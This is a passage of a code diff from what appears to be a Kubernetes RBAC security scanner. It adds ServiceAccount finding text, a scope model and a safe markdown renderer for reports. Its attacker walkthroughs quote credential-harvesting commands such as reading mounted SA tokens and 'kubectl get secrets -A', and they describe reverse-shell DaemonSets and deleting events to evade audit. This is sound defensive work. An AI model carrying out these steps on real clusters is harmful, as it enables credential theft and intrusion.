-				"Use a narrowly scoped service account for node-wide agents and audit its permissions carefully.",
-				"daemonSetUsage"))
+				"daemonSetUsage",
+				contentSADaemonset001(subject, workloadDesc, ruleSummaryText(maybeRules(perms)), hasRules)))
 		}
 	}
 
@@ -279,17 +277,21 @@ func severityForRules(rules []permissions.EffectiveRule, defaultSA bool) models.
 	}
 }
 
-// newFinding materializes a ServiceAccount-scoped finding.
-func newFinding(subject models.SubjectRef, ruleID string, severity models.Severity, score float64, title, description string, evidence map[string]any, remediation, check string) models.Finding {
+// newFinding materializes a ServiceAccount-scoped finding from a ruleContent.
+func newFinding(subject models.SubjectRef, ruleID string, severity models.Severity, score float64, evidence map[string]any, check string, content ruleContent) models.Finding {
 	evidenceBytes, _ := json.Marshal(evidence)
+	references := make([]string, 0, len(content.LearnMore))
+	for _, ref := range content.LearnMore {
+		references = append(references, ref.URL)
+	}
 	return models.Finding{
 		ID:          fmt.Sprintf("%s:%s", ruleID, subject.Key()),
 		RuleID:      ruleID,
 		Severity:    severity,
 		Score:       scoring.Clamp(score),
 		Category:    models.CategoryPrivilegeEscalation,
-		Title:       title,
-		Description: description,
+		Title:       content.Title,
+		Description: content.Description,
 		Subject:     &subject,
 		Namespace:   subject.Namespace,
 		Resource: &models.ResourceRef{
@@ -298,13 +300,47 @@ func newFinding(subject models.SubjectRef, ruleID string, severity models.Severi
 			Namespace: subject.Namespace,
 			APIGroup:  "",
 		},
-		Evidence:    evidenceBytes,
-		Remediation: remediation,
-		References: []string{
-			"https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/",
-		},
-		Tags: []string{"module:service_account", "check:" + check},
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       references,
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:service_account", "check:" + check},
 	}
+}
+
+// workloadsSummary renders the list of workloads that mount the SA into a one-line
+// human description used in finding descriptions / impact lines.
+func workloadsSummary(workloads []workloadRef) string {
+	if len(workloads) == 0 {
+		return "no workloads currently mount this SA"
+	}
+	parts := make([]string, 0, len(workloads))
+	for _, w := range workloads {
+		parts = append(parts, fmt.Sprintf("%s/%s/%s", w.Kind, w.Namespace, w.Name))
+	}
+	return strings.Join(parts, ", ")
+}
+
+// ruleSummaryText renders aggregated rules into a compact text block for finding descriptions.
+// Each line is "  - verbs on resources [from binding/role] in namespace".
+func ruleSummaryText(rules []permissions.EffectiveRule) string {
+	if len(rules) == 0 {
+		return "  (no aggregated rules)"
+	}
+	lines := make([]string, 0, len(rules))
+	for _, rule := range rules {
+		ns := rule.Namespace
+		if ns == "" {
+			ns = "cluster-wide"
+		}
+		lines = append(lines, fmt.Sprintf("  - verbs %v on resources %v (from %s/%s in %s)", rule.Verbs, rule.Resources, rule.SourceBinding, rule.SourceRole, ns))
+	}
+	return strings.Join(lines, "\n")
 }
 
 // appendUnique deduplicates by Finding.ID before appending.

--- a/internal/analyzer/serviceaccount/content.go
+++ b/internal/analyzer/serviceaccount/content.go
@@ -1,0 +1,220 @@
+// Content for ServiceAccount findings. Each builder takes runtime context (subject,
+// usage workloads, dangerous capability summary) and returns ruleContent with explicit
+// scope, attacker walkthrough, and ordered remediation.
+//
+// Sources: Kubernetes ServiceAccount docs, Bound ServiceAccount Tokens (KEP-1205), CIS
+// Kubernetes Benchmark 5.1.5 / 5.1.6, NSA/CISA Hardening Guide v1.2, MITRE ATT&CK T1078.004,
+// "kube-default-deny-sa" patterns, Aqua/CyberArk research on SA-mediated privesc.
+package serviceaccount
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/hardik/kubesplaining/internal/models"
+)
+
+type ruleContent struct {
+	Title            string
+	Scope            models.Scope
+	Description      string
+	Impact           string
+	AttackScenario   []string
+	Remediation      string
+	RemediationSteps []string
+	LearnMore        []models.Reference
+	MitreTechniques  []models.MitreTechnique
+}
+
+var (
+	mitreT1078_004 = models.MitreTechnique{ID: "T1078.004", Name: "Valid Accounts: Cloud Accounts", URL: "https://attack.mitre.org/techniques/T1078/004/"}
+	mitreT1098_004 = models.MitreTechnique{ID: "T1098.004", Name: "Account Manipulation: SSH Authorized Keys / Token Re-use", URL: "https://attack.mitre.org/techniques/T1098/"}
+	mitreT1552_007 = models.MitreTechnique{ID: "T1552.007", Name: "Container API", URL: "https://attack.mitre.org/techniques/T1552/007/"}
+	mitreT1611     = models.MitreTechnique{ID: "T1611", Name: "Escape to Host", URL: "https://attack.mitre.org/techniques/T1611/"}
+	mitreT1068     = models.MitreTechnique{ID: "T1068", Name: "Exploitation for Privilege Escalation", URL: "https://attack.mitre.org/techniques/T1068/"}
+)
+
+var (
+	refK8sSAGood       = models.Reference{Title: "Kubernetes — ServiceAccount admin: good practices", URL: "https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/"}
+	refRBACGoodPrac    = models.Reference{Title: "Kubernetes — RBAC good practices", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/"}
+	refMSThreatMatrix  = models.Reference{Title: "Microsoft — Threat Matrix for Kubernetes", URL: "https://www.microsoft.com/en-us/security/blog/2020/04/02/attack-matrix-kubernetes/"}
+	refNSAHardening    = models.Reference{Title: "NSA/CISA Kubernetes Hardening Guidance v1.2 (PDF)", URL: "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF"}
+	refDisableAutomont = models.Reference{Title: "Kubernetes — automountServiceAccountToken", URL: "https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server"}
+)
+
+// scopeForSubject reports a Cluster scope for cluster-bound subjects (namespace empty)
+// and a Namespace scope for namespaced ServiceAccounts. The Detail names the SA so the
+// reader can navigate directly.
+func scopeForSubject(subject models.SubjectRef) models.Scope {
+	if subject.Namespace == "" {
+		return models.Scope{
+			Level:  models.ScopeCluster,
+			Detail: fmt.Sprintf("ServiceAccount `%s` — bound at the cluster scope; permissions apply across every namespace", subject.Name),
+		}
+	}
+	return models.Scope{
+		Level:  models.ScopeNamespace,
+		Detail: fmt.Sprintf("ServiceAccount `%s/%s` — namespace-scoped subject; mounted by pods in `%s`", subject.Namespace, subject.Name, subject.Namespace),
+	}
+}
+
+func contentSADefault002(subject models.SubjectRef, workloads, ruleSummary string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("Default ServiceAccount `%s/default` carries explicit RBAC — every pod that omits `serviceAccountName` inherits these rights", subject.Namespace),
+		Scope: models.Scope{
+			Level:  models.ScopeNamespace,
+			Detail: fmt.Sprintf("Namespace `%s` — every Pod that does not set `serviceAccountName` mounts the `default` SA's token", subject.Namespace),
+		},
+		Description: fmt.Sprintf("ServiceAccount `%s/default` has explicit RBAC bindings. Every Pod created in `%s` that does not set `spec.serviceAccountName` is silently bound to this SA, the kubelet projects its token into the pod, and the workload can call kube-apiserver with whatever permissions the bindings grant — without anyone explicitly asking for them.\n\n"+
+			"Aggregated rules:\n%s\n\n"+
+			"This is one of the most common privilege-escalation gateways in Kubernetes for two reasons: (1) the `default` SA is the *implicit* identity for every misconfigured manifest, so a single binding to it propagates to every team in the namespace; (2) developers iterating on a deployment regularly forget to set `serviceAccountName` and never notice the elevated identity because the API behaves as expected. The Kubernetes RBAC good-practices guide is explicit: \"Avoid granting RBAC to the default service account in any namespace,\" precisely because it converts \"forgetting a field\" into \"granting privilege.\"\n\n"+
+			"The right model is to leave the default SA permissionless and require every workload to declare its identity explicitly — turning the implicit-default into a fail-closed signal that something is misconfigured.",
+			subject.Namespace, subject.Namespace, ruleSummary),
+		Impact: fmt.Sprintf("Any Pod in `%s` that omits `serviceAccountName` quietly mounts a token for these RBAC rules. Compromise of any such pod (RCE in any app) yields immediate API access at the granted privileges. Workloads attached: %s.", subject.Namespace, workloads),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker exploits a workload in `%s` that did not set `spec.serviceAccountName` (a common omission).", subject.Namespace),
+			"They read `/var/run/secrets/kubernetes.io/serviceaccount/token` from the pod filesystem.",
+			"They `curl` the kube-apiserver with the token's bearer header — the granted RBAC applies, even though the developer never knew the SA had any permissions.",
+			"They use the granted rights (typical patterns: list secrets in the namespace, list pods cluster-wide, exec into other pods) to extend reach.",
+			fmt.Sprintf("Because the binding is to `default` rather than a named SA, future pods in `%s` *also* inherit this identity — every redeploy of every workload in the namespace becomes a potential privesc point.", subject.Namespace),
+		},
+		Remediation: fmt.Sprintf("Remove all RoleBindings/ClusterRoleBindings to `%s/default`, create dedicated ServiceAccounts per workload, and set `automountServiceAccountToken: false` on the default SA.", subject.Namespace),
+		RemediationSteps: []string{
+			fmt.Sprintf("List the bindings: `kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == \"ServiceAccount\" and .name == \"default\" and .namespace == \"%s\")'`.", subject.Namespace),
+			"For each binding, identify the workloads that actually need the right and create a dedicated SA for them (`kubectl create sa <workload>-sa -n <ns>`); rebind to the dedicated SA.",
+			"Delete the bindings to `default` once consumers are migrated.",
+			fmt.Sprintf("Patch the default SA to disable token automounting: `kubectl patch sa default -n %s -p '{\"automountServiceAccountToken\": false}'`. Combined with the next step, any pod that forgets `serviceAccountName` will fail closed instead of inheriting tokens.", subject.Namespace),
+			"Wire enforcement: a Kyverno policy that warns/denies any new RoleBinding whose subjects contain `default` SA, and any Pod missing an explicit `serviceAccountName`.",
+		},
+		LearnMore: []models.Reference{
+			refK8sSAGood,
+			refRBACGoodPrac,
+			refDisableAutomont,
+			refMSThreatMatrix,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078_004, mitreT1552_007, mitreT1098_004},
+	}
+}
+
+func contentSAPrivileged001(subject models.SubjectRef, workloads, ruleSummary string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("ServiceAccount `%s` holds wildcard verbs on wildcard resources (cluster-admin equivalent)", subject.Key()),
+		Scope: scopeForSubject(subject),
+		Description: fmt.Sprintf("ServiceAccount `%s` is bound to a Role/ClusterRole that grants `verbs: [*]` on `resources: [*]` (and typically `apiGroups: [*]`). This is structurally indistinguishable from `cluster-admin` — every API operation on every resource is authorized.\n\n"+
+			"Aggregated rules:\n%s\n\n"+
+			"Wildcard-on-wildcard bindings are almost never the right design. They are typically the result of: (a) copy-pasting `cluster-admin` for an operator the team didn't have time to scope down; (b) a wildcard added \"temporarily\" during integration that never got rotated; (c) a third-party operator's installer that ships with `*/*` and assumes the operator runs in a dedicated cluster. None of those reasons survive a security review, but the binding survives because there is no concrete reason to break it. CIS Kubernetes 5.1.1 / 5.1.2 explicitly call out wildcard-on-wildcard as a finding.\n\n"+
+			"Workloads using this SA: %s. Any compromise of any of those workloads — a single CVE, a poisoned container image, a leaked configuration file containing the SA token — becomes full cluster compromise immediately. There is no defense-in-depth left.",
+			subject.Key(), ruleSummary, workloads),
+		Impact: "A single compromise of any pod mounting this SA grants full cluster control: read every Secret, exec into any pod, mutate RBAC, drain nodes, taint scheduling, install backdoor DaemonSets — every API operation succeeds.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker compromises any of the workloads using `%s` (or finds the token in any storage that touched it: backup, CI logs, a developer's kubeconfig).", subject.Key()),
+			"They `kubectl auth can-i '*' '*' --all-namespaces --token=<stolen-token>` and confirm full reach.",
+			"They `kubectl get secrets -A -o yaml` to harvest all credentials cluster-wide (cloud IAM keys, registry pull secrets, application DB passwords, third-party SaaS API keys).",
+			"They install a persistent foothold: a DaemonSet using a benign-looking image that runs an attacker reverse-shell on every node, plus a malicious mutating webhook with `failurePolicy: Ignore` so removal does not break clusters.",
+			"They cover by deleting their own audit-log entries via `kubectl delete events` (allowed under `*/*`) and rotating the SA's token to invalidate IR's existing copies.",
+		},
+		Remediation: fmt.Sprintf("Replace the wildcard binding on `%s` with the smallest concrete role that satisfies the workload's actual needs. Treat the existing token as compromised.", subject.Key()),
+		RemediationSteps: []string{
+			fmt.Sprintf("Identify the binding: `kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == \"ServiceAccount\" and .name == \"%s\" and .namespace == \"%s\")'`.", subject.Name, subject.Namespace),
+			"Generate a least-privilege role from the workload's actual API calls — capture them with `audit2rbac` (https://github.com/liggitt/audit2rbac) over a representative window, or read the operator's source for the API verbs it issues.",
+			fmt.Sprintf("Create a Role/ClusterRole with the minimum verbs and bind it to `%s`. Verify with `kubectl auth can-i` for the actual operations the workload needs (and only those).", subject.Key()),
+			"Delete the wildcard binding and rotate the SA's token (delete and recreate the SA, or rely on projected SA token TTL). Audit-log review for the SA over the last 30 days to gauge possible misuse.",
+			"Wire enforcement: a Kyverno cluster policy that fails any RoleBinding/ClusterRoleBinding granting `verbs: ['*']` on `resources: ['*']` to a non-system subject.",
+		},
+		LearnMore: []models.Reference{
+			refRBACGoodPrac,
+			refK8sSAGood,
+			refMSThreatMatrix,
+			refNSAHardening,
+			{Title: "audit2rbac — generate minimal RBAC from audit logs", URL: "https://github.com/liggitt/audit2rbac"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078_004, mitreT1098_004, mitreT1068},
+	}
+}
+
+func contentSAPrivileged002(subject models.SubjectRef, workloads string, dangerous []string) ruleContent {
+	dangerList := strings.Join(dangerous, ", ")
+	return ruleContent{
+		Title: fmt.Sprintf("ServiceAccount `%s` is mounted by live workloads and has dangerous permissions: %s", subject.Key(), dangerList),
+		Scope: scopeForSubject(subject),
+		Description: fmt.Sprintf("ServiceAccount `%s` carries one or more dangerous RBAC capabilities (%s) *and* is actively mounted by workloads (%s). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive — the attacker does not need to find the SA token, the pod is the SA token.\n\n"+
+			"The flagged capabilities map directly to known privesc paths:\n"+
+			"- `secrets` → read service-account tokens of higher-privileged SAs (`KUBE-PRIVESC-005`).\n"+
+			"- `create pods` → mount any SA in a new pod, run as root, or set `hostPath: /` to escape (`KUBE-PRIVESC-001`, `KUBE-ESCAPE-*`).\n"+
+			"- `mutate workloads` → modify a Deployment to swap its image / SA, gaining the workload's identity (`KUBE-PRIVESC-003`).\n"+
+			"- `bind roles` / `bind/escalate` → grant yourself or any SA arbitrary permissions, cluster-wide (`KUBE-PRIVESC-009`, `KUBE-PRIVESC-010`).\n"+
+			"- `impersonate` → assume any user/group/SA, instantly bypassing RBAC (`KUBE-PRIVESC-008`).\n"+
+			"- `nodes/proxy` → kubelet API access to read all pod logs/exec on a node (`KUBE-PRIVESC-012`).\n\n"+
+			"Workloads using this SA: %s. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.",
+			subject.Key(), dangerList, workloads, workloads),
+		Impact: fmt.Sprintf("Compromise of any workload using `%s` immediately grants the listed dangerous capabilities — typically a one- or two-hop chain to cluster-admin equivalent (see correlated `KUBE-PRIVESC-*` findings on the same subject).", subject.Key()),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker compromises any of the workloads (`%s`) — RCE in the application, malicious image layer, leaked manifest with embedded token.", workloads),
+			"They read `/var/run/secrets/kubernetes.io/serviceaccount/token` from the pod.",
+			fmt.Sprintf("They use the token to invoke the dangerous capabilities (%s) directly — the token already authenticates as `%s`, no further escalation needed.", dangerList, subject.Key()),
+			"For each capability they convert into the matching privesc path: `secrets`→token theft → impersonate higher SA; `bind`→grant self cluster-admin; `pods/create`→privileged pod with hostPath /.",
+			"Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain — typically `cluster-admin` if any privesc path connects.",
+		},
+		Remediation: fmt.Sprintf("Split `%s` into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.", subject.Key()),
+		RemediationSteps: []string{
+			fmt.Sprintf("Audit which of the workloads (%s) actually exercises each dangerous capability — start with `audit2rbac` over a 7-day window, then ask the workload's owner to confirm.", workloads),
+			"For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit-2rbac observed. Bind only that Role to the new SA.",
+			fmt.Sprintf("Migrate workloads to the new dedicated SA (set `spec.serviceAccountName`). Delete the bindings against the original `%s` and rotate its token.", subject.Key()),
+			"For capabilities that *no* workload actually exercises, delete the binding entirely.",
+			"Wire enforcement: a Kyverno policy that warns when `pods.spec.serviceAccountName` references an SA whose RBAC binding includes any of `[secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get]`.",
+		},
+		LearnMore: []models.Reference{
+			refRBACGoodPrac,
+			refK8sSAGood,
+			refMSThreatMatrix,
+			refNSAHardening,
+			{Title: "audit2rbac — generate minimal RBAC from audit logs", URL: "https://github.com/liggitt/audit2rbac"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078_004, mitreT1552_007, mitreT1098_004, mitreT1068},
+	}
+}
+
+func contentSADaemonset001(subject models.SubjectRef, workloads, ruleSummary string, hasRules bool) ruleContent {
+	rulesPart := "no aggregated rules"
+	if hasRules {
+		rulesPart = ruleSummary
+	}
+	return ruleContent{
+		Title: fmt.Sprintf("ServiceAccount `%s` is mounted by a DaemonSet — the SA token lives on every node the DaemonSet schedules to", subject.Key()),
+		Scope: models.Scope{
+			Level:  models.ScopeCluster,
+			Detail: fmt.Sprintf("ServiceAccount `%s` — DaemonSet places its token on every node in the cluster (or every node matching the DaemonSet's nodeSelector)", subject.Key()),
+		},
+		Description: fmt.Sprintf("ServiceAccount `%s` is mounted by a DaemonSet (%s). DaemonSets schedule one pod per matching node, so the kubelet projects this SA's token onto every one of those nodes. From an attacker's perspective, that turns any single node compromise (kernel CVE, runtime escape, host-mount-via-misconfigured-pod, malicious workload that escapes its sandbox) into immediate possession of the SA's identity, scaled by node count.\n\n"+
+			"Aggregated rules: %s\n\n"+
+			"DaemonSet-mounted SAs are special-case for two reasons:\n"+
+			"1. **Distribution**: a typical cluster has tens to thousands of nodes. The token is on each one, in `/var/lib/kubelet/pods/<uid>/volumes/...`. Any node compromise — including ones the security team would normally call \"contained to one node\" — exfiltrates the same token, and rotating one node's token does not invalidate the others (until the next pod re-projection cycle, ~1h with default token TTL).\n"+
+			"2. **Privilege**: DaemonSets are typically infrastructure agents (logging, monitoring, CNI, CSI, cluster-autoscaler) that legitimately need cluster-wide reads. So the SA tends to carry above-average permissions: `nodes:get`, `pods:list`, `events:create`, sometimes `secrets:get` for image-pull credentials. Combined with cluster-wide distribution this is a high-leverage credential.",
+			subject.Key(), workloads, rulesPart),
+		Impact: "A single node compromise yields a token that authorizes whatever this SA's RBAC says, anywhere in the cluster. With DaemonSet-typical permissions (cluster-wide reads, sometimes node-level controls) this is a fast pivot from one host to cluster-wide visibility/influence.",
+		AttackScenario: []string{
+			"Attacker compromises one node — could be a kernel CVE in a tenant workload, an outdated containerd, or a misconfigured pod with `hostPath: /` they were able to schedule there.",
+			fmt.Sprintf("From the host they read `/var/lib/kubelet/pods/*/volumes/kubernetes.io~projected-volumes/token` (the projected token of `%s`).", subject.Key()),
+			"They use the token from outside the cluster (`kubectl --token=...`) — the token still works because projection-renewal does not invalidate already-extracted copies until the original expiration.",
+			"They use the SA's RBAC for whatever it grants — typically `nodes:get`, `pods:list`, `secrets:get` for image pulls — to locate higher-value targets.",
+			"Scale: every node has a copy. Cleanup is per-node, and the team typically only rotates the compromised node's token, leaving the same SA active on all the others.",
+		},
+		Remediation: fmt.Sprintf("Tighten `%s`'s RBAC to the literal minimum the DaemonSet needs, set short token TTL (`expirationSeconds: 600`) on the projected token, and treat the DaemonSet's image and host mounts as part of the SA's effective trust boundary.", subject.Key()),
+		RemediationSteps: []string{
+			fmt.Sprintf("Audit `%s`'s actual API calls with `audit2rbac` and pare the bindings down to the minimum verbs. Remove any `secrets:get` unless explicitly required for image pulls.", subject.Key()),
+			"In the DaemonSet pod template, project the token with `expirationSeconds: 600` (10 min) instead of the default 1h — this caps the leak window for any single token theft.",
+			"Audit the DaemonSet's container image and host mounts: a DaemonSet with `hostPath: /` is itself an escape primitive. Disallow privileged containers, `hostPath`, `hostPID`, `hostNetwork` in the DaemonSet's PodSpec.",
+			"Add per-node detection: alert on `kubectl create token <sa>` invocations from outside expected control-plane subjects, and on usage of the SA's name from IPs that are not pod CIDR.",
+			fmt.Sprintf("If the DaemonSet does not actually need an API token, set `automountServiceAccountToken: false` on its PodSpec and on `%s` itself.", subject.Key()),
+		},
+		LearnMore: []models.Reference{
+			refK8sSAGood,
+			refRBACGoodPrac,
+			refDisableAutomont,
+			refMSThreatMatrix,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1552_007, mitreT1078_004},
+	}
+}

--- a/internal/models/finding.go
+++ b/internal/models/finding.go
@@ -10,24 +10,100 @@ import (
 )
 
 // Finding is the common output of every analyzer module: a scored, categorized observation tied to a subject or resource.
+//
+// The richer fields below (Scope, Impact, AttackScenario, RemediationSteps, LearnMore, MitreTechniques) are
+// optional but strongly preferred over a single-paragraph Description+Remediation. They power the structured
+// HTML report sections so a senior reviewer can grasp blast radius at a glance and a junior engineer can
+// follow the attack scenario and remediation steps.
 type Finding struct {
-	ID              string          `json:"id"`       // deterministic unique key ("RULE:ns:name")
-	RuleID          string          `json:"rule_id"`  // rule identifier, stable across runs
-	Severity        Severity        `json:"severity"` // bucketed severity used for filtering and display
-	Score           float64         `json:"score"`    // numeric 0–10 score, already clamped
-	Category        RiskCategory    `json:"category"` // risk category for grouping in the report
-	Title           string          `json:"title"`
-	Description     string          `json:"description"`
-	Subject         *SubjectRef     `json:"subject,omitempty"`  // RBAC subject this finding is about, when applicable
-	Resource        *ResourceRef    `json:"resource,omitempty"` // cluster resource this finding is about, when applicable
-	Namespace       string          `json:"namespace,omitempty"`
-	Evidence        json.RawMessage `json:"evidence,omitempty"` // analyzer-specific JSON payload describing what was found
-	Remediation     string          `json:"remediation"`
-	References      []string        `json:"references,omitempty"`
-	EscalationPath  []EscalationHop `json:"escalation_path,omitempty"` // populated by the privesc module
-	Excluded        bool            `json:"excluded"`                  // set post-analysis by the exclusions matcher
-	ExclusionReason string          `json:"exclusion_reason,omitempty"`
-	Tags            []string        `json:"tags,omitempty"` // free-form labels like "module:rbac", "check:wildcardVerbs"
+	ID               string           `json:"id"`       // deterministic unique key ("RULE:ns:name")
+	RuleID           string           `json:"rule_id"`  // rule identifier, stable across runs
+	Severity         Severity         `json:"severity"` // bucketed severity used for filtering and display
+	Score            float64          `json:"score"`    // numeric 0–10 score, already clamped
+	Category         RiskCategory     `json:"category"` // risk category for grouping in the report
+	Title            string           `json:"title"`
+	Description      string           `json:"description"`
+	Subject          *SubjectRef      `json:"subject,omitempty"`  // RBAC subject this finding is about, when applicable
+	Resource         *ResourceRef     `json:"resource,omitempty"` // cluster resource this finding is about, when applicable
+	Namespace        string           `json:"namespace,omitempty"`
+	Scope            Scope            `json:"scope,omitzero"`              // explicit blast radius (cluster | namespace | workload | object)
+	Impact           string           `json:"impact,omitempty"`            // one-line concrete blast-radius statement
+	AttackScenario   []string         `json:"attack_scenario,omitempty"`   // ordered narrative steps an attacker would take
+	Evidence         json.RawMessage  `json:"evidence,omitempty"`          // analyzer-specific JSON payload describing what was found
+	Remediation      string           `json:"remediation"`                 // one-line summary fix
+	RemediationSteps []string         `json:"remediation_steps,omitempty"` // ordered concrete actions, kubectl/YAML examples allowed
+	References       []string         `json:"references,omitempty"`
+	LearnMore        []Reference      `json:"learn_more,omitempty"`       // structured references (Title + URL)
+	MitreTechniques  []MitreTechnique `json:"mitre_techniques,omitempty"` // ATT&CK technique IDs for Containers / Kubernetes
+	EscalationPath   []EscalationHop  `json:"escalation_path,omitempty"`  // populated by the privesc module
+	Excluded         bool             `json:"excluded"`                   // set post-analysis by the exclusions matcher
+	ExclusionReason  string           `json:"exclusion_reason,omitempty"`
+	Tags             []string         `json:"tags,omitempty"` // free-form labels like "module:rbac", "check:wildcardVerbs"
+}
+
+// Reference is a structured external citation (e.g. CIS benchmark, MITRE ATT&CK technique, K8s docs).
+// Title is what a reader sees; URL is the link target.
+type Reference struct {
+	Title string `json:"title"`
+	URL   string `json:"url"`
+}
+
+// MitreTechnique names a single MITRE ATT&CK technique relevant to the finding (Containers / Kubernetes matrices).
+type MitreTechnique struct {
+	ID   string `json:"id"`   // e.g. "T1611"
+	Name string `json:"name"` // e.g. "Escape to Host"
+	URL  string `json:"url"`  // e.g. "https://attack.mitre.org/techniques/T1611/"
+}
+
+// Scope captures the explicit blast radius of a finding. It is what the reader sees
+// when asking "how much of the cluster is exposed by this single finding?". Level is
+// the bucket used for sorting/filtering; Detail is the human-readable description
+// that names specific namespaces, workload, or object.
+type Scope struct {
+	Level  ScopeLevel `json:"level"`            // cluster | namespace | workload | object
+	Detail string     `json:"detail,omitempty"` // human-readable, e.g. "Cluster-wide (all namespaces)" or "Namespace: prod (12 secrets, 4 service accounts)"
+}
+
+// ScopeLevel is the bucketed scope level for filtering and sorting.
+type ScopeLevel string
+
+const (
+	ScopeCluster   ScopeLevel = "cluster"   // affects every namespace / cluster-scoped object
+	ScopeNamespace ScopeLevel = "namespace" // affects one namespace
+	ScopeWorkload  ScopeLevel = "workload"  // affects one workload (Deployment/DaemonSet/StatefulSet/Job/CronJob/Pod)
+	ScopeObject    ScopeLevel = "object"    // affects a single object (Secret, ConfigMap, NetworkPolicy, etc.)
+)
+
+// Rank returns an integer ordering: cluster > namespace > workload > object. Used to sort/filter by blast radius.
+func (s ScopeLevel) Rank() int {
+	switch s {
+	case ScopeCluster:
+		return 4
+	case ScopeNamespace:
+		return 3
+	case ScopeWorkload:
+		return 2
+	case ScopeObject:
+		return 1
+	default:
+		return 0
+	}
+}
+
+// Label returns the human-readable label for a scope level.
+func (s ScopeLevel) Label() string {
+	switch s {
+	case ScopeCluster:
+		return "Cluster"
+	case ScopeNamespace:
+		return "Namespace"
+	case ScopeWorkload:
+		return "Workload"
+	case ScopeObject:
+		return "Object"
+	default:
+		return "Unknown"
+	}
 }
 
 // Severity is the bucketed severity level attached to every Finding.

--- a/internal/report/glossary.go
+++ b/internal/report/glossary.go
@@ -322,7 +322,7 @@ var Categories = map[string]CategoryExplainer{
 		Title: "Control Bypass",
 		Plain: template.HTML(`<p>The attacker turns off, weakens, or works around the cluster's policy enforcement — admission webhooks, Pod Security admission, OPA/Gatekeeper, or audit configuration. After this, follow-on actions become invisible to defenders.</p>`),
 		Examples: []string{
-			"Patching a ValidatingWebhookConfiguration to <code>failurePolicy: Ignore</code>, then deleting the backing service.",
+			"Patching a `ValidatingWebhookConfiguration` to `failurePolicy: Ignore`, then deleting the backing service.",
 			"Removing a Pod Security label from a namespace to allow privileged pods.",
 		},
 	},
@@ -330,7 +330,7 @@ var Categories = map[string]CategoryExplainer{
 		Title: "Detection Evasion",
 		Plain: template.HTML(`<p>The attacker hides their tracks — disabling audit logging, deleting events, rolling back resource versions, or abusing legitimate-looking patterns (impersonation, service accounts) so the activity blends in.</p>`),
 		Examples: []string{
-			"Using <code>--as=system:serviceaccount:kube-system:replicaset-controller</code> to impersonate a high-volume controller and disappear in audit log noise.",
+			"Using `--as=system:serviceaccount:kube-system:replicaset-controller` to impersonate a high-volume controller and disappear in audit log noise.",
 			"Deleting Events that record the privileged pod's creation.",
 		},
 	},

--- a/internal/report/graph_script.go
+++ b/internal/report/graph_script.go
@@ -265,7 +265,9 @@ const kpGraphScript = `
     tooltip.style.top = (rect.top + window.pageYOffset - 12) + 'px';
     var t = tooltip.querySelector('.kp-tt-title');
     var b = tooltip.querySelector('.kp-tt-body');
-    t.textContent = title || '';
+    // Title may contain backticks/**bold** from analyzer-supplied finding text;
+    // renderInlineHTML escapes content and inserts safe <code>/<strong> tags.
+    t.innerHTML = renderInlineHTML(title || '');
     if (htmlBody) { b.innerHTML = htmlBody; b.hidden = false; }
     else { b.innerHTML = ''; b.hidden = true; }
     tooltip.hidden = false;
@@ -303,12 +305,123 @@ const kpGraphScript = `
     }
   }
 
+  // ---- Markdown helpers (popup-pane prose) -----------------------------
+  // Tiny tokenizer for the limited markdown analyzers emit:
+  //   ` + "`" + `code` + "`" + `         → <code>
+  //   **bold** → <strong>
+  // Always uses textContent for content so analyzer strings can never
+  // inject HTML. Returns nothing — appends nodes into the target.
+  function renderInline(text, target) {
+    var s = String(text || '');
+    var i = 0;
+    while (i < s.length) {
+      var bold = s.indexOf('**', i);
+      var code = s.indexOf('` + "`" + `', i);
+      var next = -1, which = null;
+      if (bold >= 0 && (code < 0 || bold < code)) { next = bold; which = 'bold'; }
+      else if (code >= 0) { next = code; which = 'code'; }
+      if (next < 0) {
+        target.appendChild(document.createTextNode(s.slice(i)));
+        return;
+      }
+      if (next > i) target.appendChild(document.createTextNode(s.slice(i, next)));
+      if (which === 'bold') {
+        var end = s.indexOf('**', next + 2);
+        if (end < 0) { target.appendChild(document.createTextNode(s.slice(next))); return; }
+        var strong = document.createElement('strong');
+        strong.textContent = s.slice(next + 2, end);
+        target.appendChild(strong);
+        i = end + 2;
+      } else {
+        var endC = s.indexOf('` + "`" + `', next + 1);
+        if (endC < 0) { target.appendChild(document.createTextNode(s.slice(next))); return; }
+        var c = document.createElement('code');
+        c.textContent = s.slice(next + 1, endC);
+        target.appendChild(c);
+        i = endC + 1;
+      }
+    }
+  }
+
+  // renderInlineHTML mirrors renderInline but returns an HTML string instead of
+  // appending DOM nodes — the floating tooltip uses innerHTML so it needs an
+  // HTML-string output. Text content is always escaped; only the safe ` + "`" + `<code>` + "`" + `
+  // and ` + "`" + `<strong>` + "`" + ` tags are inserted.
+  function renderInlineHTML(text) {
